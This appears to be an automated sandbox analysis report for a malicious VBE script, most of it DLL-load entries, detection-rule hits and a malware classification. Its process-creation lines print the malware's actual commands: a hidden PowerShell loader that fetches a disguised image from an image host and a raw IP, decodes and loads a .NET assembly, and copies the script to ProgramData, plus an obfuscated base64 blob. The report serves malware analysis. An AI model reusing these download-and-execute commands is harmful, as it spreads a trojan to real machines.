Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll

Source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBE@11/8@3/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa0kiksk.2zz.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreX